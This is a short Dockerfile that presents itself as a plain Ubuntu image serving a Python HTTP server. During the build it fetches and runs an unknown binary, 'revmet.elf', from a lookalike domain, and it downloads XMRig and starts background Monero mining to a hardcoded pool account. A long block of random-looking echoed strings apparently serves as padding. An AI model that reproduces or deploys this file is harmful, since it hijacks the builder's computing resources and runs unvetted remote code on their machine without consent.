FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo 5SKU3OOWrD4huNzOi9lwRZuzBReFXt1I wdUCCACmU32P08el9ZPdmXeAGK2FrhzS hdPPfyoAd6H9vuh9VFqBv3FD6BjzpTu0 V4EeNDpBk9JsuQSch7seXIYQbe7TeD9Q khUEK8dSP2hwU9l7l74fV6jjKNrHLoar nlavNN9AvJEliVeHQGCOqYtKT3K9XHHM p97qfSeTrrpiccPoXvYiLbazbticGFLq KjFYWLZsiSY7BGRCFDfojUdu2xUfAyT4 AKxZeROaXKJkZrCt2ubCTwnRPLAdA8Pq KofK79nVv3BFIZdvB1IvD0PKBZAuL1JI ayPLKA8JtAdr9oaB9VnlTY5U6i78ciFv DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]